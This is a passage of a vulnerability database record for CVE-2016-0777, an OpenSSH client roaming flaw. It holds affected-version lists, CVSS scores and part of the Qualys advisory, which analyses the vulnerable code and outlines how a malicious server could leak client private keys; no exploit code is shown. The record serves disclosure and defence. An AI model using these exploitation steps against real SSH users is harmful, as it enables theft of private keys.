"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "10.1"
},
{
"model": "10.1-beta3-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.0-release-p6",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.0-release-p2",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "9.3"
},
{
"model": "10.1-rc3-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-prerelease",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p21",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p24",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.1-release-p19",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p13",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.1-prerelease",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.0-release-p17",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-rc2",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-rc3-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "10.2"
},
{
"model": "10.1-release-p25",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-rc1-p2",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.1-rc4-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.1-release-p6",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.2-beta2-p3",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "mq appliance m2000",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "0"
},
{
"model": "10.0-rc2-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p31",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "junos 13.3r1.8",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "10.0-release-p18",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.2-stable",
"scope": "ne",
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p5",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "extremexos",
"scope": "eq",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "21.1"
},
{
"model": "9.3-beta1-p2",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.0-rc1-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.1-release-p23",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.1-release-p16",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.0-release-p12",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p6",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p9",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.0-release-p7",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "junos 12.3r1.8",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "10.0"
},
{
"model": "9.3-release-p29",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "extremexos",
"scope": "eq",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "0"
},
{
"model": "10.2-prerelease",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.2-release-p10",
"scope": "ne",
"trust": 0.3,
"vendor": "freebsd",
"version": null
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#456088"
},
{
"db": "BID",
"id": "80698"
},
{
"db": "BID",
"id": "80695"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-249"
},
{
"db": "NVD",
"id": "CVE-2016-0777"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sophos:unified_threat_management_software:9.353:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:unified_threat_management_software:9.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:sophos:unified_threat_management:220:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:sophos:unified_threat_management:320:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:sophos:unified_threat_management:625:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:sophos:unified_threat_management:425:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:sophos:unified_threat_management:525:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:sophos:unified_threat_management:120:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:sophos:unified_threat_management:110:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.0:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.4:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.2:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.9:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.8:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.9:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.7:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.0:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.3:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.9:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.1:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.1:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.5:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.0:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.6:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.8:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.7:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.3:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.2:p2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.1:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.2:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.4:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.6:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.5:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.9:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:hp:remote_device_access_virtual_customer_access_system:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "15.07",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "10.11.3",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-0777"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Qualys Security Advisory team",
"sources": [
{
"db": "BID",
"id": "80698"
},
{
"db": "BID",
"id": "80695"
}
],
"trust": 0.6
},
"cve": "CVE-2016-0777",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "VHN-88287",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULMON",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2016-0777",
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "MEDIUM",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-0777",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201601-249",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-88287",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2016-0777",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-88287"
},
{
"db": "VULMON",
"id": "CVE-2016-0777"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-249"
},
{
"db": "NVD",
"id": "CVE-2016-0777"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The resend_bytes function in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2 allows remote servers to obtain sensitive information from process memory by requesting transmission of an entire buffer, as demonstrated by reading a private key. OpenSSH client code versions 5.4 through 7.1p1 contains a client information leak vulnerability that could allow an OpenSSH client to leak information not limited to but including private keys, as well as a buffer overflow in certain non-default configurations. OpenSSH is prone to a heap-based buffer-overflow vulnerability. \nSuccessful exploits may allow attackers to execute arbitrary code in the context of the affected application. Failed attacks will cause denial-of-service conditions. \nSuccessfully exploiting this issue allows attackers to obtain sensitive information that may aid in further attacks. OpenSSH (OpenBSD Secure Shell) is a set of connection tools for securely accessing remote computers maintained by the OpenBSD project team. This tool is an open source implementation of the SSH protocol, supports encryption of all transmissions, and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. The following versions are affected: OpenSSH 5.x, 6.x, 7.x prior to 7.1p2. \nQualys Security Advisory\n\nRoaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778\n\n\n========================================================================\nContents\n========================================================================\n\nSummary\nInformation Leak (CVE-2016-0777)\n- Analysis\n- Private Key Disclosure\n- Mitigating Factors\n- Examples\nBuffer Overflow (CVE-2016-0778)\n- Analysis\n- Mitigating Factors\n- File Descriptor Leak\nAcknowledgments\nProof Of Concept\n\n\n========================================================================\nSummary\n========================================================================\n\nSince version 5.4 (released on March 8, 2010), the OpenSSH client\nsupports an undocumented feature called roaming: if the connection to an\nSSH server breaks unexpectedly, and if the server supports roaming as\nwell, the client is able to reconnect to the server and resume the\nsuspended SSH session. This information leak may have already been exploited in\nthe wild by sophisticated attackers, and high-profile sites or users may\nneed to regenerate their SSH keys accordingly. \n\nThe buffer overflow, on the other hand, is present in the default\nconfiguration of the OpenSSH client but its exploitation requires two\nnon-default options: a ProxyCommand, and either ForwardAgent (-A) or\nForwardX11 (-X). This buffer overflow is therefore unlikely to have any\nreal-world impact, but provides a particularly interesting case study. \n\nAll OpenSSH versions between 5.4 and 7.1 are vulnerable, but can be\neasily hot-fixed by setting the undocumented option \"UseRoaming\" to\n\"no\", as detailed in the Mitigating Factors section. OpenSSH version\n7.1p2 (released on January 14, 2016) disables roaming by default. \n\n\n========================================================================\nInformation Leak (CVE-2016-0777)\n========================================================================\n\n------------------------------------------------------------------------\nAnalysis\n------------------------------------------------------------------------\n\nIf the OpenSSH client connects to an SSH server that offers the key\nexchange algorithm \"resume@appgate.com\", it sends the global request\n\"roaming@appgate.com\" to the server, after successful authentication. If\nthis request is accepted, the client allocates a roaming buffer out_buf,\nby calling malloc() (and not calloc()) with an out_buf_size that is\narbitrarily chosen by the server:\n\n 63 void\n 64 roaming_reply(int type, u_int32_t seq, void *ctxt)\n 65 {\n 66 if (type == SSH2_MSG_REQUEST_FAILURE) {\n 67 logit(\"Server denied roaming\");\n 68 return;\n 69 }\n 70 verbose(\"Roaming enabled\");\n .. \n 75 set_out_buffer_size(packet_get_int() + get_snd_buf_size());\n .. \n 77 }\n\n 40 static size_t out_buf_size = 0;\n 41 static char *out_buf = NULL;\n 42 static size_t out_start;\n 43 static size_t out_last;\n .. \n 75 void\n 76 set_out_buffer_size(size_t size)\n 77 {\n 78 if (size == 0 || size \u003e MAX_ROAMBUF)\n 79 fatal(\"%s: bad buffer size %lu\", __func__, (u_long)size);\n 80 /*\n 81 * The buffer size can only be set once and the buffer will live\n 82 * as long as the session lives. \n 83 */\n 84 if (out_buf == NULL) {\n 85 out_buf_size = size;\n 86 out_buf = xmalloc(size);\n 87 out_start = 0;\n 88 out_last = 0;\n 89 }\n 90 }\n\nThe OpenSSH client\u0027s roaming_write() function, a simple wrapper around\nwrite(), calls wait_for_roaming_reconnect() to transparently reconnect\nto the SSH server after a disconnection. It also calls buf_append() to\ncopy the data sent to the server into the roaming buffer out_buf. During\na reconnection, the client is therefore able to resend the data that was\nnot received by the server because of the disconnection:\n\n198 void\n199 resend_bytes(int fd, u_int64_t *offset)\n200 {\n201 size_t available, needed;\n202\n203 if (out_start \u003c out_last)\n204 available = out_last - out_start;\n205 else\n206 available = out_buf_size;\n207 needed = write_bytes - *offset;\n208 debug3(\"resend_bytes: resend %lu bytes from %llu\",\n209 (unsigned long)needed, (unsigned long long)*offset);\n210 if (needed \u003e available)\n211 fatal(\"Needed to resend more data than in the cache\");\n212 if (out_last \u003c needed) {\n213 int chunkend = needed - out_last;\n214 atomicio(vwrite, fd, out_buf + out_buf_size - chunkend,\n215 chunkend);\n216 atomicio(vwrite, fd, out_buf, out_last);\n217 } else {\n218 atomicio(vwrite, fd, out_buf + (out_last - needed), needed);\n219 }\n220 }\n\nIn the OpenSSH client\u0027s roaming buffer out_buf, the most recent data\nsent to the server begins at index out_start and ends at index out_last. \nAs soon as this circular buffer is full, buf_append() maintains the\ninvariant \"out_start = out_last + 1\", and consequently three different\ncases have to be considered:\n\n- \"out_start \u003c out_last\" (lines 203-204): out_buf is not full yet (and\n out_start is still equal to 0), and the amount of data available in\n out_buf is indeed \"out_last - out_start\";\n\n- \"out_start \u003e out_last\" (lines 205-206): out_buf is full (and out_start\n is exactly equal to \"out_last + 1\"), and the amount of data available\n in out_buf is indeed the entire out_buf_size;\n\n- \"out_start == out_last\" (lines 205-206): no data was ever written to\n out_buf (and both out_start and out_last are still equal to 0) because\n no data was ever sent to the server after roaming_reply() was called,\n but the client sends (leaks) the entire uninitialized out_buf to the\n server (line 214), as if out_buf_size bytes of data were available. \n\nIn order to successfully exploit this information leak and retrieve\nsensitive information from the OpenSSH client\u0027s memory (for example,\nprivate SSH keys, or memory addresses useful for further exploitation),\na malicious server needs to:\n\n- Massage the client\u0027s heap before roaming_reply() malloc()ates out_buf,\n and force malloc() to return a previously free()d but uncleansed chunk\n of sensitive information. The simple proof-of-concept in this advisory\n does not implement heap massaging. \n\n- Guess the client\u0027s get_snd_buf_size() in order to precisely control\n out_buf_size. OpenSSH \u003c 6.0 accepts out_buf sizes in the range (0,4G),\n and OpenSSH \u003e= 6.0 accepts sizes in the range (0,2M]. Sizes smaller\n than get_snd_buf_size() are attainable because roaming_reply() does\n not protect \"packet_get_int() + get_snd_buf_size()\" against integer\n wraparound. The proof-of-concept in this advisory attempts to derive\n the client\u0027s get_snd_buf_size() from the get_recv_buf_size() sent by\n the client to the server, and simply chooses a random out_buf_size. \n\n- Advise the client\u0027s resend_bytes() that all \"available\" bytes (the\n entire out_buf_size) are \"needed\" by the server, even if fewer bytes\n were actually written by the client to the server (because the server\n controls the \"*offset\" argument, and resend_bytes() does not protect\n \"needed = write_bytes - *offset\" against integer wraparound). \n\nFinally, a brief digression on a minor bug in resend_bytes(): on 64-bit\nsystems, where \"chunkend\" is a 32-bit signed integer, but \"out_buf\" and\n\"out_buf_size\" are 64-bit variables, \"out_buf + out_buf_size - chunkend\"\nmay point out-of-bounds, if chunkend is negative (if out_buf_size is in\nthe [2G,4G) range). This negative chunkend is then converted to a 64-bit\nsize_t greater than SSIZE_MAX when passed to atomicio(), and eventually\nreturns EFAULT when passed to write() (at least on Linux and OpenBSD),\nthus avoiding an out-of-bounds read from the OpenSSH client\u0027s memory. \n\n------------------------------------------------------------------------\nPrivate Key Disclosure\n------------------------------------------------------------------------\n\nWe initially believed that this information leak in the OpenSSH client\u0027s\nroaming code would not allow a malicious SSH server to steal the\nclient\u0027s private keys, because:\n\n- the information leaked is not read from out-of-bounds memory, but from\n a previously free()d chunk of memory that is recycled to malloc()ate\n the client\u0027s roaming buffer out_buf;\n\n- private keys are loaded from disk into memory and freed by key_free()\n (old API, OpenSSH \u003c 6.7) or sshkey_free() (new API, OpenSSH \u003e= 6.7),\n and both functions properly cleanse the private keys\u0027 memory with\n OPENSSL_cleanse() or explicit_bzero();\n\n- temporary copies of in-memory private keys are freed by buffer_free()\n (old API) or sshbuf_free() (new API), and both functions attempt to\n cleanse these copies with memset() or bzero(). \n\nHowever, we eventually identified three reasons why, in our experiments,\nwe were able to partially or completely retrieve the OpenSSH client\u0027s\nprivate keys through this information leak (depending on the client\u0027s\nversion, compiler, operating system, heap layout, and private keys):\n\n(besides these three reasons, other reasons may exist, as suggested by\nthe CentOS and Fedora examples at the end of this section)\n\n1. If a private SSH key is loaded from disk into memory by fopen() (or\nfdopen()), fgets(), and fclose(), a partial or complete copy of this\nprivate key may remain uncleansed in memory. Indeed, these functions\nmanage their own internal buffers, and whether these buffers are\ncleansed or not depends on the OpenSSH client\u0027s libc (stdio)\nimplementation, but not on OpenSSH itself. \n\n- In all vulnerable OpenSSH versions, SSH\u0027s main() function calls\n load_public_identity_files(), which loads the client\u0027s public keys\n with fopen(), fgets(), and fclose(). Unfortunately, the private keys\n (without the \".pub\" suffix) are loaded first and then discarded, but\n nonetheless buffered in memory by the stdio functions. \n\n- In OpenSSH versions \u003c= 5.6, the load_identity_file() function (called\n by the client\u0027s public-key authentication method) loads a private key\n with fdopen() and PEM_read_PrivateKey(), an OpenSSL function that uses\n fgets() and hence internal stdio buffering. \n\nInternal stdio buffering is the most severe of the three problems\ndiscussed in this section, although GNU/Linux is not affected because\nthe glibc mmap()s and munmap()s (and therefore cleanses) stdio buffers. \nBSD-based systems, on the other hand, are severely affected because they\nsimply malloc()ate and free() stdio buffers. For interesting comments on\nthis issue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MEM06-C.+Ensure+that+sensitive+data+is+not+written+out+to+disk\n\n2. In OpenSSH versions \u003e= 5.9, the client\u0027s load_identity_file()\nfunction (called by the public-key authentication method) read()s a\nprivate key in 1024-byte chunks that are appended to a growing buffer (a\nrealloc()ating buffer) with buffer_append() (old API) or sshbuf_put()\n(new API). Unfortunately, the repeated calls to realloc() may leave\npartial copies of the private key uncleansed in memory. \n\n- In OpenSSH \u003c 6.7 (old API), the initial size of such a growing buffer\n is 4096 bytes: if a private-key file is larger than 4K, a partial copy\n of this private key may remain uncleansed in memory (a 3K copy in a 4K\n buffer). Fortunately, only the file of a very large RSA key (for\n example, an 8192-bit RSA key) can exceed 4K. \n\n- In OpenSSH \u003e= 6.7 (new API), the initial size of a growing buffer is\n 256 bytes: if a private-key file is larger than 1K (the size passed to\n read()), a partial copy of this private key may remain uncleansed in\n memory (a 1K copy in a 1K buffer). For example, the file of a\n default-sized 2048-bit RSA key exceeds 1K. \n\nFor more information on this issue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MEM03-C.+Clear+sensitive+information+stored+in+reusable+resources\n\nhttps://cwe.mitre.org/data/definitions/244.html\n\n3. An OpenSSH growing-buffer that holds a private key is eventually\nfreed by buffer_free() (old API) or sshbuf_free() (new API), and both\nfunctions attempt to cleanse the buffer with memset() or bzero() before\nthey call free(). Unfortunately, an optimizing compiler may remove this\nmemset() or bzero() call, because the buffer is written to, but never\nagain read from (an optimization known as Dead Store Elimination). \n\nOpenSSH 6.6 is the only version that is not affected, because it calls\nexplicit_bzero() instead of memset() or bzero(). \n\nDead Store Elimination is the least severe of the three problems\nexplored in this section, because older GCC versions do not remove the\nmemset() or bzero() call made by buffer_free() or sshbuf_free(). GCC 5\nand Clang/LLVM do, however, remove it. For detailed discussions of this\nissue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MSC06-C.+Beware+of+compiler+optimizations\n\nhttps://cwe.mitre.org/data/definitions/14.html\n\nhttps://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506\n\nFinally, for these three reasons, passphrase-encrypted SSH keys are\nleaked in their encrypted form, but an attacker may attempt to crack the\npassphrase offline. On the other hand, SSH keys that are available only\nthrough an authentication agent are never leaked, in any form. The vulnerable roaming code can be permanently disabled by adding the\nundocumented option \"UseRoaming no\" to the system-wide configuration\nfile (usually /etc/ssh/ssh_config), or per-user configuration file\n(~/.ssh/config), or 